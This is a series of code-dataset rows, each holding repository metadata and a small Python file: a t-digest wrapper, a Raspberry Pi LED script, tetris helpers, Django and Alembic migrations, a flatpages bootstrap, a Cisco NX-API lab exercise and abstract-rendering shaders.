| 42.194444 | 110 | 0.705069 | 162 | 1,519 | 6.376543 | 0.45679 | 0.03485 | 0.065828 | 0.112294 | 0.197483 | 0.129719 | 0.129719 | 0 | 0 | 0 | 0 | 0.000794 | 0.171165 | 1,519 | 35 | 111 | 43.4 | 0.819698 | 0.093483 | 0 | 0 | 0 | 0 | 0.059767 | 0 | 0 | 0 | 0 | 0 | 0.04 | 1 | 0.16 | false | 0 | 0.28 | 0.04 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
04efda0cbdd1c825ae596ff29f999628d80ef0ca | 4,484 | py | Python | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 2 | 2020-01-03T13:41:42.000Z | 2022-02-17T06:26:10.000Z | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 2 | 2020-11-02T03:33:49.000Z | 2020-11-02T04:42:16.000Z | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 1 | 2019-12-14T05:37:29.000Z | 2019-12-14T05:37:29.000Z | from collections import namedtuple
from readerwriterlock.rwlock import RWLockWrite
from ._tdigest import lib as _lib
DEFAULT_COMPRESSION = 400
Centroid = namedtuple("Centroid", ("weight", "mean"))
class RawTDigest:
def __init__(self, compression=DEFAULT_COMPRESSION):
if not isinstance(compression, int):
raise TypeError("'compression' must be of type 'int'")
if compression <= 0:
raise ValueError("'compression' must larger than 0")
self._struct = _lib.tdigest_new(compression)
def __del__(self):
if hasattr(self, "_struct"):
_lib.tdigest_free(self._struct)
def _compress(self):
_lib.tdigest_compress(self._struct)
@property
def compression(self):
return self._struct.compression
@property
def threshold(self):
return self._struct.threshold
@property
def size(self):
return self._struct.size
@property
def weight(self):
if self._struct.point_count:
self._compress()
return self._struct.weight
@property
def centroid_count(self):
if self._struct.point_count:
self._compress()
return self._struct.centroid_count
@property
def compression_count(self):
return self._struct.compression_count
def insert(self, value, weight=1):
if not isinstance(value, (float, int)):
raise TypeError("'value' must be of type 'float' or 'int'")
if not isinstance(weight, int):
raise TypeError("'weight' must be of type 'int'")
if weight <= 0:
            raise ValueError("'weight' must be larger than 0")
_lib.tdigest_add(self._struct, value, weight)
def quantile(self, value):
if not isinstance(value, float):
raise TypeError("'value' must be of type 'float'")
if value < 0.0 or value > 1.0:
raise ValueError("'value' must be between 0.00 and 1.00")
return _lib.tdigest_quantile(self._struct, value)
def percentile(self, value):
if not isinstance(value, (int, float)):
raise TypeError("'value' must be of type 'float' or 'int'")
if value < 0 or value > 100:
raise ValueError("'value' must be between 0 and 100")
return _lib.tdigest_quantile(self._struct, value / 100)
def cdf(self, value):
if not isinstance(value, (int, float)):
raise TypeError("'value' must be of type 'float' or 'int'")
return _lib.tdigest_cdf(self._struct, value)
def centroids(self):
for i in range(self.centroid_count):
centroid = self._struct.centroids[i]
yield Centroid(centroid.weight, centroid.mean)
def merge(self, other):
if not isinstance(other, (TDigest, RawTDigest)):
            raise TypeError("'other' must be of type 'TDigest' or 'RawTDigest'")
_lib.tdigest_merge(self._struct, other._struct)
class TDigest(RawTDigest):
def __init__(self, compression=DEFAULT_COMPRESSION):
super().__init__(compression)
self._lock = RWLockWrite()
@property
def compression(self):
with self._lock.gen_rlock():
return super().compression
@property
def threshold(self):
with self._lock.gen_rlock():
return super().threshold
@property
def size(self):
with self._lock.gen_rlock():
return super().size
@property
def weight(self):
with self._lock.gen_wlock():
return super().weight
@property
def centroid_count(self):
with self._lock.gen_wlock():
return super().centroid_count
@property
def compression_count(self):
with self._lock.gen_rlock():
return super().compression_count
def insert(self, value, weight=1):
with self._lock.gen_wlock():
return super().insert(value, weight)
def quantile(self, value):
with self._lock.gen_wlock():
return super().quantile(value)
def percentile(self, value):
with self._lock.gen_wlock():
return super().percentile(value)
def cdf(self, value):
with self._lock.gen_wlock():
return super().cdf(value)
    def centroids(self):
        # materialize the centroids while the lock is held; returning the
        # parent's lazy generator would release the lock before iteration
        with self._lock.gen_wlock():
            return list(super().centroids())
def merge(self, other):
with self._lock.gen_wlock():
return super().merge(other)
| 27.509202 | 80 | 0.618198 | 529 | 4,484 | 5.060491 | 0.139887 | 0.067239 | 0.053792 | 0.067239 | 0.612253 | 0.522226 | 0.459843 | 0.30183 | 0.209937 | 0.115428 | 0 | 0.009222 | 0.274532 | 4,484 | 162 | 81 | 27.679012 | 0.81371 | 0 | 0 | 0.504274 | 0 | 0 | 0.093443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.239316 | false | 0 | 0.025641 | 0.034188 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
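The record above wraps a compiled t-digest structure through CFFI, so it cannot run without the `_tdigest` extension. The API shape — `insert` with validation, `quantile` over [0, 1], and `percentile` as a thin `value / 100` delegate — can be sketched with a pure-Python stand-in. `SortedQuantiles` below is a hypothetical illustration using exact nearest-rank quantiles, not the interpolated centroids a real t-digest uses.

```python
import bisect

class SortedQuantiles:
    """Exact-quantile stand-in mirroring the RawTDigest validation style."""

    def __init__(self):
        self._values = []

    def insert(self, value, weight=1):
        if not isinstance(value, (float, int)):
            raise TypeError("'value' must be of type 'float' or 'int'")
        if not isinstance(weight, int):
            raise TypeError("'weight' must be of type 'int'")
        if weight <= 0:
            raise ValueError("'weight' must be larger than 0")
        for _ in range(weight):
            bisect.insort(self._values, value)

    def quantile(self, value):
        if value < 0.0 or value > 1.0:
            raise ValueError("'value' must be between 0.00 and 1.00")
        # nearest-rank lookup over the exact sorted sample
        idx = min(int(value * len(self._values)), len(self._values) - 1)
        return self._values[idx]

    def percentile(self, value):
        # same delegation as RawTDigest.percentile: scale to [0, 1] first
        return self.quantile(value / 100.0)

q = SortedQuantiles()
for v in range(1, 101):
    q.insert(float(v))
print(q.quantile(0.5), q.percentile(50))
```

The thread-safe `TDigest` subclass then only needs to wrap these calls in read or write locks, which is exactly the pattern the file implements with `RWLockWrite`.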
04f0f376222a8dd88886d737c5f5530edda3b637 | 185 | py | Python | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | 1 | 2021-10-04T20:44:01.000Z | 2021-10-04T20:44:01.000Z | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | null | null | null | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | null | null | null | import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import time
from lib_utils import *
from lib_leds import LEDS
leds = LEDS()
leds.on()
time.sleep(30)
leds.off() | 14.230769 | 25 | 0.756757 | 32 | 185 | 4.3125 | 0.53125 | 0.173913 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012422 | 0.12973 | 185 | 13 | 26 | 14.230769 | 0.844721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
04f2a0495b108a61505d38568ea3bf1b921fa496 | 999 | py | Python | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
] | 2 | 2019-11-19T12:54:17.000Z | 2020-08-19T13:25:35.000Z | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
] | null | null | null | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
] | null | null | null | from numba import njit
@njit
def print_board_to_string(state):
string = "\n"
for row_ix in range(state.representation.shape[0]):
# Start from top
row_ix = state.num_rows - row_ix - 1
string += "|"
for col_ix in range(state.num_columns):
if state.representation[row_ix, col_ix]:
string += "██"
else:
string += " "
string += "|\n"
return string
@njit
def print_tetromino(tetromino_index):
if tetromino_index == 0:
string = '''
██ ██ ██ ██'''
elif tetromino_index == 1:
string = '''
██ ██
██ ██'''
elif tetromino_index == 2:
string = '''
██ ██
██ ██'''
elif tetromino_index == 3:
        string = '''
██ ██
██ ██'''
elif tetromino_index == 4:
        string = '''
██
██ ██ ██'''
elif tetromino_index == 5:
        string = '''
██ ██ ██
██'''
elif tetromino_index == 6:
        string = """
██ ██ ██
██"""
return string
| 19.588235 | 55 | 0.473473 | 128 | 999 | 3.992188 | 0.296875 | 0.164384 | 0.164384 | 0.164384 | 0.403131 | 0.375734 | 0.375734 | 0.375734 | 0 | 0 | 0 | 0.013761 | 0.345345 | 999 | 50 | 56 | 19.98 | 0.678899 | 0.014014 | 0 | 0.409091 | 0 | 0 | 0.114053 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.022727 | 0 | 0.113636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
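The `print_board_to_string` function above is `@njit`-compiled and expects a state object with a numpy `representation` plus `num_rows`/`num_columns`. Its row-flipping logic (drawing the top row first) can be shown without numba. `BoardState` below is a stand-in assumed for illustration, not part of the tetris package.

```python
from collections import namedtuple

# hypothetical stand-in for the njit-compiled state object
BoardState = namedtuple("BoardState", ("representation", "num_rows", "num_columns"))

def board_to_string(state):
    """Pure-Python mirror of print_board_to_string (top row rendered first)."""
    string = "\n"
    for row_ix in range(len(state.representation)):
        # start from the top: map loop index 0 to the highest row
        row_ix = state.num_rows - row_ix - 1
        string += "|"
        for col_ix in range(state.num_columns):
            string += "██" if state.representation[row_ix][col_ix] else "  "
        string += "|\n"
    return string

board = BoardState([[1, 0], [0, 1]], num_rows=2, num_columns=2)
print(board_to_string(board))
```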
04f33a4db6a3d77dadc337f038d05a2584b99585 | 817 | py | Python | main/migrations/0017_auto_20200608_1908.py | eugenek45/project-review | 7fadba65968f5c4f0d4e9c75aaadb63a3c918a2b | [
"MIT",
"Unlicense"
] | null | null | null | main/migrations/0017_auto_20200608_1908.py | eugenek45/project-review | 7fadba65968f5c4f0d4e9c75aaadb63a3c918a2b | [
"MIT",
"Unlicense"
] | 7 | 2021-03-30T14:10:00.000Z | 2022-01-13T03:04:50.000Z | main/migrations/0017_auto_20200608_1908.py | NgugiMuthoni/django3 | 81569804f3f008f7a0430ecf00186e7097aca64c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2020-06-08 16:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.utils.timezone
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('main', '0016_auto_20200608_1635'),
]
operations = [
migrations.AlterField(
model_name='project',
name='image',
field=models.ImageField(default=django.utils.timezone.now, upload_to=''),
preserve_default=False,
),
migrations.AlterField(
model_name='project',
name='reviewDate',
field=models.DateTimeField(default=datetime.datetime(2020, 6, 8, 16, 8, 21, 921926, tzinfo=utc)),
),
]
| 27.233333 | 109 | 0.632803 | 90 | 817 | 5.611111 | 0.588889 | 0.065347 | 0.112871 | 0.114851 | 0.158416 | 0.158416 | 0 | 0 | 0 | 0 | 0 | 0.080196 | 0.252142 | 817 | 29 | 110 | 28.172414 | 0.746318 | 0.080783 | 0 | 0.272727 | 1 | 0 | 0.074866 | 0.030749 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.227273 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04fde6a91399f1b1649e35274fd649d62fdf4bc6 | 846 | py | Python | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | null | null | null | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | null | null | null | flatpages/bootstrap.py | amol-/tgapp-flatpages | f75dafbd026a40f14d84b68669b5c2d165f896c8 | [
"MIT"
] | 1 | 2018-05-02T15:03:06.000Z | 2018-05-02T15:03:06.000Z | # -*- coding: utf-8 -*-
"""Setup the flatpages application"""
from __future__ import print_function
from flatpages import model
from tgext.pluggable import app_model
import logging
log = logging.getLogger(__name__)
def bootstrap(command, conf, vars):
log.info('Bootstrapping flatpages...')
# creating a new permission and assign it to managers group
p = app_model.Permission(permission_name='flatpages', description='Can manage flat pages')
try: # sqlalchemy
g = model.DBSession.query(app_model.Group).filter_by(group_name='managers').first()
    except Exception:  # ming
g = app_model.Group.query.find(dict(group_name='managers')).first()
if g:
p.groups = [g]
try:
model.DBSession.add(p)
except AttributeError:
pass # ming doesn't need to add
model.DBSession.flush()
| 26.4375 | 94 | 0.685579 | 109 | 846 | 5.165138 | 0.587156 | 0.056838 | 0.046181 | 0.078153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001481 | 0.202128 | 846 | 31 | 95 | 27.290323 | 0.832593 | 0.180851 | 0 | 0.105263 | 0 | 0 | 0.105417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.052632 | 0.210526 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ca014c25d096d91028ea9e83c7bd4dbddd8eb75a | 474 | py | Python | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | null | null | null | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | 1 | 2020-11-04T18:29:10.000Z | 2020-11-04T18:32:44.000Z | blog/migrations/0010_auto_20201206_2106.py | gabrielstonedelza/connectdjango | b1fd2c70695ae71144cf8c473bfa9f5e37f7e9af | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-12-06 21:06
import blog.validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_remove_chatroom_allow_any'),
]
operations = [
migrations.AlterField(
model_name='chatroom',
name='room_logo',
field=models.ImageField(upload_to='room_pics', validators=[blog.validator.validate_file_size]),
),
]
| 23.7 | 107 | 0.647679 | 54 | 474 | 5.5 | 0.740741 | 0.087542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052778 | 0.240506 | 474 | 19 | 108 | 24.947368 | 0.772222 | 0.094937 | 0 | 0 | 1 | 0 | 0.140515 | 0.070258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b8e6f29824ae76e1a3ea0be36034c5b768f6ae | 2,058 | py | Python | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | 1 | 2019-04-17T02:49:58.000Z | 2019-04-17T02:49:58.000Z | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | null | null | null | class7/ex7_nxapi_xml.py | sbyount/pyaut3 | 2fcf19851487db49d76d5b6996ee0f9194d90816 | [
"Apache-2.0"
] | null | null | null | from getpass import getpass
from nxapi_plumbing import Device
from lxml import etree
from pprint import pprint as pp
# Disable Self-signed Certificate Warnings
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
'''
7. NX-API using XML and the nxapi_plumbing library
7a. Create an nxapi_plumbing "Device" object for nxos1. The api_format should be
"xml" and the transport should be "https" (port 8443). Use getpass() to capture
the device's password. Send the "show interface Ethernet2/1" command to the device,
parse the output, and print out the following information:
Interface: Ethernet2/1; State: up; MTU: 1500
7b. Run the following two show commands on the nxos1 device using a single method
and passing in a list of commands: "show system uptime" and "show system resources".
Print the XML output from these two commands.
7c. Using the nxapi_plumbing config_list() method, configure two loopbacks on
nxos1 including interface descriptions. Pick random loopback interface numbers
between 100 and 199.
'''
device = Device(
api_format="xml",
host="nxos1.lasthop.io",
username="pyclass",
password=getpass(),
transport="https",
port=8443,
verify=False,
)
intf_output = device.show("show interface Ethernet2/1")
print('7a')
print(f'Interface: {intf_output.find(".//interface").text}')
print(f'State: {intf_output.find(".//state").text}')
print(f'MTU: {intf_output.find(".//eth_mtu").text}')
print('7b')
show_output = device.show_list(["show system uptime", "show system resources"])
for output in show_output:
print(etree.tostring(output, encoding="unicode"))
commands = [
"interface loopback151",
"description loopback151",
"no shutdown",
"interface loopback152",
"description loopback152",
"no shutdown",
]
print('7c')
output = device.config_list(commands)
# Look at the output XML for each configuration command
for msg in output:
print(etree.tostring(msg, encoding="unicode"))
| 30.716418 | 84 | 0.751701 | 285 | 2,058 | 5.368421 | 0.410526 | 0.033987 | 0.037255 | 0.030065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027857 | 0.145287 | 2,058 | 66 | 85 | 31.181818 | 0.841956 | 0.045675 | 0 | 0.054054 | 0 | 0 | 0.31115 | 0.095938 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.054054 | 0.162162 | 0 | 0.162162 | 0.243243 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
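Exercise 7a above extracts fields from the device's XML response with `.find(".//tag").text` on an lxml tree. The same lookup works against the stdlib's `xml.etree.ElementTree`, which makes the parsing step easy to try offline. The fragment below is a hypothetical, simplified shape of the NX-API output — the real response is larger and namespaced.

```python
import xml.etree.ElementTree as ET

# hypothetical fragment shaped like "show interface Ethernet2/1" XML output
xml_output = """
<output>
  <interface>Ethernet2/1</interface>
  <state>up</state>
  <eth_mtu>1500</eth_mtu>
</output>
"""

root = ET.fromstring(xml_output)
# same .find(".//tag").text lookups used against the lxml tree in ex7
print(f"Interface: {root.find('.//interface').text}; "
      f"State: {root.find('.//state').text}; "
      f"MTU: {root.find('.//eth_mtu').text}")
```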
b6b90e06479763706578fab36f6a27abef53dde3 | 607 | py | Python | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | migrations/versions/dd503a5987b5_.py | atwh0405/miniblog | 820fc2ec1b38210783a6b340827f6c0213277f3e | [
"MIT"
] | null | null | null | """empty message
Revision ID: dd503a5987b5
Revises: b4722c8968df
Create Date: 2016-08-30 16:48:54.954000
"""
# revision identifiers, used by Alembic.
revision = 'dd503a5987b5'
down_revision = 'b4722c8968df'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('name', sa.String(length=64), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'name')
### end Alembic commands ###
| 22.481481 | 82 | 0.691928 | 76 | 607 | 5.486842 | 0.605263 | 0.064748 | 0.100719 | 0.110312 | 0.211031 | 0.211031 | 0.211031 | 0.211031 | 0 | 0 | 0 | 0.107356 | 0.171334 | 607 | 26 | 83 | 23.346154 | 0.72167 | 0.479407 | 0 | 0 | 0 | 0 | 0.14841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b9e50dcc239d248e5f15f0184951362519c58c | 7,604 | py | Python | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | abstract_rendering/numeric.py | detrout/python-abstract-rendering | 331bc72d83d8429c547ff326a7853debbebaf471 | [
"BSD-3-Clause-Open-MPI"
] | null | null | null | from __future__ import print_function, division, absolute_import
from six.moves import reduce
import numpy as np
import math
import abstract_rendering.core as core
import abstract_rendering.util as util
# ----------- Aggregators -----------
class Count(core.GlyphAggregator):
"""Count the number of items that fall into a particular grid element."""
out_type = np.int32
identity = 0
def allocate(self, glyphset, screen):
(width, height) = screen
return np.zeros((height, width), dtype=self.out_type)
def combine(self, existing, glyph, shapecode, val):
update = self.glyphAggregates(glyph, shapecode, 1, self.identity)
existing[glyph[1]:glyph[3], glyph[0]:glyph[2]] += update
def rollup(self, *vals):
return reduce(lambda x, y: x+y, vals)
class Sum(core.GlyphAggregator):
"""Count the number of items that fall into a particular grid element."""
out_type = np.int32
identity = 0
def allocate(self, glyphset, screen):
(width, height) = screen
return np.zeros((height, width), dtype=self.out_type)
def combine(self, existing, glyph, shapecode, val):
update = self.glyphAggregates(glyph, shapecode, val, self.identity)
existing[glyph[1]:glyph[3], glyph[0]:glyph[2]] += update
def rollup(self, *vals):
return reduce(lambda x, y: x+y, vals)
# -------------- Shaders -----------------
class Floor(core.CellShader):
def shade(self, grid):
return np.floor(grid)
class Interpolate(core.CellShader):
"""Interpolate between two numbers.
Projects the input values between the low and high values passed.
The Default is 0 to 1.
Empty values are preserved (default is np.nan).
"""
def __init__(self, low=0, high=1, empty=np.nan):
self.low = low
self.high = high
self.empty = empty
def shade(self, grid):
# TODO: Gracefully handle if the whole grid is empty
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
span = float(max-min)
percents = (grid-min)/span
return self.low + (percents * (self.high-self.low))
class Power(core.CellShader):
"""Raise to a power. Power may be fracional."""
def __init__(self, pow):
self.pow = pow
def shade(self, grid):
return np.power(grid, self.pow)
class Cuberoot(Power):
def __init__(self):
super(Cuberoot, self).__init__(1/3.0)
class Sqrt(core.CellShader):
def shade(self, grid):
return np.sqrt(grid)
class Spread(core.SequentialShader):
"""
Spreads the values out in a regular pattern.
* factor : How far in each direction to spread
TODO: Currently only does square spread. Extend to other shapes.
TODO: Restricted to numbers right now...implement corresponding thing
for categories...might be 'generic'
"""
def __init__(self, up=1, down=1, left=1, right=1, factor=np.NaN):
if np.isnan(factor):
self.up = up
self.down = down
self.left = left
self.right = right
else:
self.up = factor
self.down = factor
self.left = factor
self.right = factor
def makegrid(self, grid):
height = grid.shape[0]
width = grid.shape[1]
others = grid.shape[2:]
height = height + self.up + self.down
width = width + self.left + self.right
return np.zeros((height, width) + others, dtype=grid.dtype)
def cellfunc(self, grid, x, y):
(height, width) = grid.shape
minx = max(0, x-self.left-self.right)
maxx = min(x+1, width)
miny = max(0, y-self.up-self.down)
maxy = min(y+1, height)
parts = grid[miny:maxy, minx:maxx]
return parts.sum()
class BinarySegment(core.CellShader):
"""
Paint all pixels with aggregate value above divider one color
and below the divider another. Divider is part of the 'high' region.
TODO: Extend so out can be something other than colors
"""
in_type = (1, np.number)
out_type = (4, np.int32)
def __init__(self, low, high, divider):
self.high = high
self.low = low
self.divider = float(divider)
def shade(self, grid):
(width, height) = grid.shape[0], grid.shape[1]
outgrid = np.ndarray((width, height, 4), dtype=np.uint8)
mask = (grid >= self.divider)
outgrid[mask] = self.high
outgrid[~mask] = self.low
return outgrid
class InterpolateColors(core.CellShader):
"""
High-definition interpolation between two colors.
Zero-values are treated separately from other values.
TODO: Remove log, just provide a shader to pre-transform the values
TODO: Can this be combined with 'Interpolate'? Detect type at construction
* low -- Color ot use for lowest value
* high -- Color to use for highest values
* log -- Set to desired log base to use log-based interpolation
(use True or "e" for base-e; default is False)
* reserve -- color to use for empty cells
"""
in_type = (1, np.number)
out_type = (4, np.int32)
def __init__(self,
low, high,
log=False,
reserve=util.Color(255, 255, 255, 255),
empty=np.nan):
self.low = low
self.high = high
self.reserve = reserve
self.log = log
self.empty = empty
# TODO: there are issues with zeros here....
def _log(self, grid):
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
grid[mask] = 1
        if (self.log == 10):
            min = math.log10(min)
            max = math.log10(max)
            span = float(max-min)
            percents = (np.log10(grid)-min)/span
        elif (self.log == 2):
            min = math.log(min, self.log)
            max = math.log(max, self.log)
            span = float(max-min)
            percents = (np.log2(grid)-min)/span
        elif (self.log == math.e or self.log is True or self.log == "e"):
            min = math.log(min)
            max = math.log(max)
            span = float(max-min)
            percents = (np.log(grid)-min)/span
        else:
            # arbitrary numeric base: log_b(x) = log(x) / log(b)
            rebase = math.log(self.log)
            min = math.log(min, self.log)
            max = math.log(max, self.log)
            span = float(max-min)
            percents = ((np.log(grid)/rebase)-min)/span
grid[mask] = 0
colorspan = (np.array(self.high, dtype=np.uint8)
- np.array(self.low, dtype=np.uint8))
outgrid = (percents[:, :, np.newaxis]
* colorspan[np.newaxis, np.newaxis, :]
+ np.array(self.low, dtype=np.uint8)).astype(np.uint8)
outgrid[mask] = self.reserve
return outgrid
def _linear(self, grid):
mask = (grid == self.empty)
min = grid[~mask].min()
max = grid[~mask].max()
span = float(max-min)
percents = (grid-min)/span
colorspan = (np.array(self.high, dtype=np.int32)
- np.array(self.low, dtype=np.int32))
outgrid = (percents[:, :, np.newaxis]
* colorspan[np.newaxis, np.newaxis, :]
+ np.array(self.low, dtype=np.uint8)).astype(np.uint8)
outgrid[mask] = self.reserve
return outgrid
def shade(self, grid):
if (self.log):
return self._log(grid)
else:
return self._linear(grid)
| 30.785425 | 78 | 0.577065 | 987 | 7,604 | 4.397163 | 0.221885 | 0.020968 | 0.01659 | 0.02212 | 0.426498 | 0.420968 | 0.395161 | 0.367742 | 0.341244 | 0.341244 | 0 | 0.014791 | 0.297607 | 7,604 | 246 | 79 | 30.910569 | 0.797791 | 0.194108 | 0 | 0.44375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028455 | 0 | 1 | 0.1375 | false | 0 | 0.0375 | 0.03125 | 0.38125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
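The `Interpolate` shader in the record above min-max scales the non-empty cells of a 2-D numpy grid into `[low, high]` while preserving empty cells. A 1-D pure-Python sketch of the same arithmetic (assumed simplification — the real shader works on grids and uses numpy masking):

```python
import math

def interpolate(values, low=0.0, high=1.0, empty=float("nan")):
    """1-D sketch of the Interpolate shader: min-max scale non-empty cells
    into [low, high], passing empty cells through unchanged."""
    is_empty = [math.isnan(v) if math.isnan(empty) else v == empty
                for v in values]
    filled = [v for v, e in zip(values, is_empty) if not e]
    lo, hi = min(filled), max(filled)
    span = float(hi - lo)
    # same formula as the shader: low + percents * (high - low)
    return [v if e else low + ((v - lo) / span) * (high - low)
            for v, e in zip(values, is_empty)]

print(interpolate([2.0, 4.0, 6.0]))
```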
